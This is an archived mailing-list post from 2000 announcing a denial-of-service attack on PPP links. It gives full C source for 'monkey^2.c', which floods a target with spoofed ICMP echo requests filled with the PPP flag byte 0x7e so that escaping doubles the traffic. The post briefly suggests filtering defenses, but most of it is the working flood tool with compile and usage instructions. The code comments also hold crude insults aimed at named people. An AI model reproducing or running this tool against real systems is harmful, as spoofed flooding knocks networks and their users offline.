Vulnerability Development mailing list archives
New DOS attack vs ppp links
From: bahz0r () YAHOO COM (cat catzor)
Date: Fri, 21 Jul 2000 03:51:35 -0700
------
USSR Research.
Concept:
PPP uses a speciffic flag byte to signify begining and
end of ppp frame.
If this byte is contained in the data portion of the
frame it is escaped by two
other bytes. Crafting a packet filled with the flag
byte doubles the amount of
data which goes through the ppp link, as well as
consumes resources while the escaped
bytes are unescaped.
Problem:
"Problem" (and i do say "problem" because i see no way
around this) lies within ppp itself,
on link level. It is irrelevant which protocol is used
to deliver data to the target
machine.
Solution:
Disallow icmp trafic to your ppp connected machines
(before the ppp link), or filter
packets which contain suspicious number of the ppp
flag byte (0x7e);
Technical:
A typical ppp frame looks like this:
[FLAG
(7e)][ADDR][CONTROL][PROTOCOL][INFORMATION][CRC][FLAG
(7e)]
Note: most implementations don't actually transmit
addr and control fields (since these
are static). If the flag charachter is contained
within the [INFORMATION] portion of the
frame, it is replaced by a sequence of [0x7d 0x5e] So
if an incoming packet contains
one 7e byte, it will get converted to two other bytes
when it enters the ppp link, hence,
the flood will double. The attached code uses icmp
echo request to deliver the data to
target. If the target also replies to this packet (as
it should) it will once again amplify
the flood. In other words, for each byte the attacker
sends, targets gets hit with two,
and replies with two. Attached code supports spoofing
of originating IP adress.
NOTE: by default ppp will also escape any byte with
value less than 0x20 (i.e any ASCII
controll charachter) so while simply filtering
suspicious amounts of 0x7e might save
your ppp users from this particular piece of code,
modifying the attack is as simple as
changing the data character.
Code:
Code developed by xaiou.
Concept developed by xaiou, reviewed by USSR Research.
File Name: monkey^2.c
Platform: linux 2.x
Compile: gcc -o monkey^2 monkey.c
Suggested: ansi color capable terminal.
IMPORTANT: in order for this to do what it's supposed
to do, it is imperial that the
attacker NOT be on a ppp link himself. If one was to
attack a ppp link FROM a ppp link,
it would prove completely useless. (because you'd be
sending 2 bytes and target would be
getting hit by two, you might as well ping -f);
---------------------- begin monkey^2.c
----------------------------------
/****************************************************************************
* Monkey Squared Dot Cee - only thing better than a
monkey.... *
* is monkey squared. - me myself and xaiou.
*
* USSR Research Team - Concept and code by xaiou.
Checksum function *
* stolen from smurf by TFreak.
*
* Concept: ppp uses a special byte, namely 0x7e to
designate start and *
* end of a packet. If this byte appears in data, it
is escaped with *
* 0x7d and 0x5e. So in conclusion sending, a spoofed
icmp echo request *
* to a target host on ppp link, loaded with 0x7e,
first of all, the load *
* doubles when it hits the ppp link, and if that
wasn't enough, the victim *
* responds with this packet, again doubling the load.
So for each 1 byte *
* you send victim recieves two and sends out two.
Not bad, eh? Anyways *
* the only solution I see to this is to block icmp
echo requests to your *
* ppp linked friends.
*
*
*
* Props: USSR Research, Neounix.com, superluck,
optiklenz, *
* Richard Stevens (you're my hero), powerbox,
armoredtech *
* w00w00 team (j00 ar3 3rl33t), all the people
in #c (i love you *
* guys!), aliensex, OGL, IanH. Also TFreak (i
hope you don't mind *
* me borrowing your checksum function.) Also
phrack and route *
* (you are my other hero), BlackIC for the
coloreds. DJ Jeff from *
* the 418 club in mineapolis, and that one
stripper... *
*
*
* Morons: digiebola ("hacker" who can't code hello
world) and his slut *
* "girlfriend" (the girl part is debatable).
All irc hookers, *
* people who run NT, people who buy NT,
people who make NT, *
* People who think think they're LOU (you are
not lou damn it) *
*
*
* --------------------- USSR Research Team 2000
--------------------------*/
#include <stdio.h>
#include <stdlib.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/ip_icmp.h>
#include <netdb.h>
#include <ctype.h>
#include <arpa/inet.h>
#include <unistd.h>
#include <string.h>
#define GREEN "\033[32m"
#define RED "\033[31m"
#define GRAY "\033[37m"
unsigned short in_chksum (u_short *addr, int len); /*
stolen from smurf */
void ussrinfo(void);
void usage(void);
int main (int ARGC, char *ARGV[]) {
struct iphdr *iphdr;
struct icmphdr *icmphdr;
struct sockaddr_in sockaddress;
char *packet;
int raw_socket;
int i;
int no_packetsz;
int sizeofpacket;
char *data;
ussrinfo();
if(ARGC != 5) { usage(); exit(0); }
sizeofpacket = atoi(ARGV[4]);
data = (char *)malloc(sizeofpacket);
memset(data, 0x7e, sizeofpacket);
/* name the socket */
sockaddress.sin_addr.s_addr = inet_addr(ARGV[2]);
sockaddress.sin_family = AF_INET; /* internet socket
*/
sockaddress.sin_port = 0; /* it's icmp...no port */
if ((raw_socket = socket(AF_INET, SOCK_RAW,
IPPROTO_RAW)) < 0) {
perror("getting socket");
exit(-1);
}
packet = malloc(sizeof(struct iphdr) + sizeof(struct
icmphdr) + sizeofpacket);
iphdr = (struct iphdr *)packet; /* ip now refers to
packet.iphdr */
icmphdr = (struct icmphdr *) (packet + sizeof(struct
iphdr));
iphdr->tot_len = htons(sizeof(struct iphdr) +
sizeof(struct icmphdr) + sizeofpacket);
iphdr->ihl = 5; /* ip header lenght in 32 bit
words */
iphdr->version = 4;
iphdr->ttl = 255; /* maximum hops */
iphdr->tos = 0;
iphdr->frag_off = 0; /* data offset */
iphdr->protocol = IPPROTO_ICMP;
iphdr->saddr = inet_addr(ARGV[1]); /* fake source
*/
iphdr->daddr = sockaddress.sin_addr.s_addr;
/* reall destination */
iphdr->check = in_chksum((u_short *)iphdr,
sizeof(struct iphdr)); /* checksum */
icmphdr->type = 8; /* echo
request */
icmphdr->code = 0; /* icmp
subcode...screw it */
icmphdr->checksum = in_chksum((u_short *)icmphdr,
sizeof(struct icmphdr) + sizeofpacket);
printf(RED"Now flooding %s\n", ARGV[2]);
no_packetsz = atoi(ARGV[3]);
i=0;
while(1) {
printf(GRAY".");
sendto(raw_socket, packet, (sizeof(struct
iphdr) + sizeof(struct icmphdr) + sizeofpacket), 0,
(struct sockaddr *)&sockaddress, sizeof(struct
sockaddr));
if( (i > no_packetsz) && (no_packetsz !=
0)) { break; }
i++;
}
printf(GREEN"\nMonkey Complete...monkey squared
complete.\n"GRAY);
return 1;
}
unsigned short in_chksum (u_short *addr, int len)
{
register int nleft = len;
register int sum = 0;
u_short answer = 0;
while (nleft > 1) {
sum += *addr++;
nleft -= 2;
}
if (nleft == 1) {
*(u_char *)(&answer) = *(u_char *)addr;
sum += answer;
}
sum = (sum >> 16) + (sum + 0xffff);
sum += (sum >> 16);
answer = ~sum;
return(answer);
}
void ussrinfo(void) {
printf("---------------------------------------------------------------\n");
printf(GREEN"| Underground Security Systems Research
Proudly Presents: |\n\n");
printf("| monkey squared dot cee - ppp linkz ...the
end is near. | \n");
printf("| By: xaiou (tarik).
| \n");
}
void usage(void) {
printf(RED"| Usage: monkey^2 source destination
number (0 for infinite ) |\n");
printf(GRAY"|---------------------USSR Research
--------------------------|\n");
}
------------------------------------ end monkey^2.c
------------------------
EOF
__________________________________________________
Do You Yahoo!?
Get Yahoo! Mail Free email you can access from anywhere!
http://mail.yahoo.com/
<HR NOSHADE>
<UL>
<LI>application/x-unknown attachment: monkey^2.c
</UL>
Current thread:
- New DOS attack vs ppp links cat catzor (Jul 21)
- Re: New DOS attack vs ppp links Brad Spengler (Jul 23)
- Re: New DOS attack vs ppp links Eric Andry (Jul 27)
- Re: New DOS attack vs ppp links Brad Spengler (Jul 28)
- Re: New DOS attack vs ppp links Eric Andry (Jul 27)
- Re: New DOS attack vs ppp links Brad Spengler (Jul 23)